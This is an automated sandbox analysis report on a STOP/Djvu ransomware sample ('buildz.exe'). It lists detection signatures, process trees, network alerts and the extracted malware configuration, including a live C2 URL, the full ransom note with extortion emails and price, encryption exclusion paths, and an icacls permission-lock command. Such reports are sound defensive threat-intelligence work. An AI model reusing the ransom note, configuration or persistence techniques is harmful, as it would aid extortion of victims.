Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
buildz.exe

Overview

General Information

Sample name:buildz.exe
Analysis ID:1526419
MD5:b7cb7f2b5cd9bd047710650295dc88f7
SHA1:3740ba8e89055cb0f5068ec9176b05c77432e799
SHA256:e01c0429a58b33013305aab35ef863cd2b88962e479e39566a687ca37c68510f
Tags:exeuser-aachum
Infos:

Detection

Babuk, Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Tries to harvest and steal browser information (history, passwords, etc)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • buildz.exe (PID: 5576 cmdline: "C:\Users\user\Desktop\buildz.exe" MD5: B7CB7F2B5CD9BD047710650295DC88F7)
    • buildz.exe (PID: 5272 cmdline: "C:\Users\user\Desktop\buildz.exe" MD5: B7CB7F2B5CD9BD047710650295DC88F7)
      • icacls.exe (PID: 6460 cmdline: icacls "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
      • buildz.exe (PID: 5240 cmdline: "C:\Users\user\Desktop\buildz.exe" --Admin IsNotAutoStart IsNotTask MD5: B7CB7F2B5CD9BD047710650295DC88F7)
        • buildz.exe (PID: 432 cmdline: "C:\Users\user\Desktop\buildz.exe" --Admin IsNotAutoStart IsNotTask MD5: B7CB7F2B5CD9BD047710650295DC88F7)
  • buildz.exe (PID: 7120 cmdline: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe --Task MD5: B7CB7F2B5CD9BD047710650295DC88F7)
    • buildz.exe (PID: 4708 cmdline: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe --Task MD5: B7CB7F2B5CD9BD047710650295DC88F7)
  • buildz.exe (PID: 940 cmdline: "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart MD5: B7CB7F2B5CD9BD047710650295DC88F7)
    • buildz.exe (PID: 6848 cmdline: "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart MD5: B7CB7F2B5CD9BD047710650295DC88F7)
  • buildz.exe (PID: 5700 cmdline: "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart MD5: B7CB7F2B5CD9BD047710650295DC88F7)
    • buildz.exe (PID: 2148 cmdline: "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart MD5: B7CB7F2B5CD9BD047710650295DC88F7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
{"Download URLs": [""], "C2 url": "http://cajgtus.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool.\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0876qual", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2iF2z8qTGWyGMtNhPR7G\\\\nMGAf\\/Cj6VowurSUOyORyuV6zmACc4fML4hGZe2+jMtlmPuDm9AKDe2A7ktEm+8AV\\\\nWTov1Vz9zeVkt6hy7KlP+fM+wTiEtwbYALKQV0RCYHyhH8z36Dco\\/dcL+M+OSwcd\\\\nJ9jJ5VBro0+QMbS+FRjk0GS4DwzprGjSwPLJWp4H1iZHhEcUplB4krFkwsyNfhb\\/\\\\naiJzA\\/4ZYz\\/+hPdv9YQxd3R+bgv2LdzV605176wsakPezqJxUSHxOEkkpYP4P149\\\\nXsXG76vTNjWPRW\\/M3+oKBtMvAXzMYuRR9q1peV++b1l6hgkiuqDicGvT9JPCUDld\\\\n4QIDAQAB\\\\n-----END PUBLIC KEY-----"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.2313135610.0000000000933000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2523332173.0000000000814000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      Click to see the 47 entries
      SourceRuleDescriptionAuthorStrings
      2.2.buildz.exe.400000.0.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        2.2.buildz.exe.400000.0.raw.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        2.2.buildz.exe.400000.0.raw.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
        • 0xffe88:$x1: C:\SystemID\PersonalID.txt
        • 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
        • 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\
        • 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
        • 0x1002ec:$s1: " --AutoStart
        • 0x100300:$s1: " --AutoStart
        • 0x103f48:$s2: --ForNetRes
        • 0x103f10:$s3: --Admin
        • 0x104390:$s4: %username%
        • 0x1044b4:$s5: ?pid=
        • 0x1044c0:$s6: &first=true
        • 0x1044d8:$s6: &first=false
        • 0x1003f4:$s7: delself.bat
        • 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
        • 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
        • 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
        8.2.buildz.exe.22b15a0.1.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          8.2.buildz.exe.22b15a0.1.raw.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          Click to see the 55 entries

          System Summary

          barindex
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\buildz.exe, ProcessId: 5272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-05T16:26:17.000369+020020363351A Network Trojan was detected190.219.117.24080192.168.2.549711TCP
          2024-10-05T16:26:48.174876+020020363351A Network Trojan was detected190.219.117.24080192.168.2.549869TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-05T16:26:16.993980+020020363341A Network Trojan was detected192.168.2.549711190.219.117.24080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-05T16:26:04.602511+020028032742Potentially Bad Traffic192.168.2.549704188.114.97.3443TCP
          2024-10-05T16:26:13.362152+020028032742Potentially Bad Traffic192.168.2.549705188.114.97.3443TCP
          2024-10-05T16:26:16.993980+020028032742Potentially Bad Traffic192.168.2.549711190.219.117.24080TCP
          2024-10-05T16:26:25.360105+020028032742Potentially Bad Traffic192.168.2.549751188.114.97.3443TCP
          2024-10-05T16:26:36.529275+020028032742Potentially Bad Traffic192.168.2.549797188.114.97.3443TCP
          2024-10-05T16:26:46.617721+020028032742Potentially Bad Traffic192.168.2.549858188.114.97.3443TCP
          2024-10-05T16:26:48.167152+020028032742Potentially Bad Traffic192.168.2.549869190.219.117.24080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-05T16:26:48.167152+020028334381Malware Command and Control Activity Detected192.168.2.549869190.219.117.24080TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: buildz.exeAvira: detected
          Source: 00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": [""], "C2 url": "http://cajgtus.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool.\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0876qual", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\",
          Source: cajgtus.comVirustotal: Detection: 19%Perma Link
          Source: api.2ip.uaVirustotal: Detection: 9%Perma Link
          Source: http://cajgtus.com/lancer/get.phpnalVirustotal: Detection: 24%Perma Link
          Source: https://api.2ip.ua/Virustotal: Detection: 7%Perma Link
          Source: https://api.2ip.ua/geo.json/Virustotal: Detection: 6%Perma Link
          Source: http://cajgtus.com/lancer/get.phpVirustotal: Detection: 19%Perma Link
          Source: https://api.2ip.ua/geo.jsonUdVirustotal: Detection: 8%Perma Link
          Source: https://api.2ip.ua/geo.jsonVirustotal: Detection: 7%Perma Link
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeReversingLabs: Detection: 91%
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeVirustotal: Detection: 81%Perma Link
          Source: buildz.exeReversingLabs: Detection: 91%
          Source: buildz.exeVirustotal: Detection: 80%Perma Link
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: buildz.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040E870
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040EA51 CryptDestroyHash,CryptReleaseContext,2_2_0040EA51
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040EAA0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040EC68 CryptDestroyHash,CryptReleaseContext,2_2_0040EC68
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00410FC0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00411178 CryptDestroyHash,CryptReleaseContext,2_2_00411178
          Source: buildz.exe, 00000006.00000003.2490478427.0000000000693000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_65ccc40a-0

          Compliance

          barindex
          Source: C:\Users\user\Desktop\buildz.exeUnpacked PE file: 2.2.buildz.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\buildz.exeUnpacked PE file: 6.2.buildz.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeUnpacked PE file: 10.2.buildz.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeUnpacked PE file: 12.2.buildz.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeUnpacked PE file: 15.2.buildz.exe.400000.0.unpack
          Source: buildz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\_readme.txtJump to behavior
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49797 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49858 version: TLS 1.2
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\.pdb\p source: buildz.exe, 00000006.00000003.2866705786.000000000385D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: buildz.exe, 00000006.00000003.2725563548.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2439164862.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726652522.0000000003177000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726101777.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789829817.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2829091548.0000000003163000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2830232221.000000000316F000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2817262340.0000000003156000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2505810794.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790962184.0000000003177000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790419206.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2819937848.0000000003169000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2504691310.0000000003147000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2830146833.0000000003169000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2725563548.0000000003146000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726652522.0000000003177000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726243486.000000000313B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2726101777.0000000003175000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789829817.000000000315E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725563548.000000000311A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2725945284.000000000312E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790348604.0000000003191000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\aq source: buildz.exe, 00000006.00000003.2725802650.0000000003747000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.quallual01.txt.qualn1h2txyewy\ source: buildz.exe, 00000006.00000003.2902801314.0000000003180000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2903842838.0000000003197000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\.exe source: buildz.exe, 00000006.00000003.2790917732.00000000037CB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790773651.00000000037A7000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2789619660.000000000373E000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2790278127.000000000378D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\licati source: buildz.exe, 00000006.00000003.2791259010.000000000310F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2908778230.0000000003A5A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2918151256.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917779893.0000000003949000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2917318091.0000000003940000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2920284157.0000000003A5B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: buildz.exe, 00000006.00000003.2864608950.0000000003918000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2830683737.00000000038F1000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2831125784.0000000003909000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2869267366.0000000003921000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\0T source: buildz.exe, 00000006.00000003.2902921961.0000000003796000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2911345558.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2909511400.000000000379F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: buildz.exe, 00000006.00000003.2927908987.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935552901.0000000003A2A000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2928758672.0000000003A0B000.00000004.00000020.00020000.00000000.sdmp, buildz.exe, 00000006.00000003.2935479787.0000000003A23000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\bbwe\ SeFRL source: buildz.exe, 00000006.00000003.2940073344.0000000003122000.00000004.00000020.00020000.00000000.sdmp
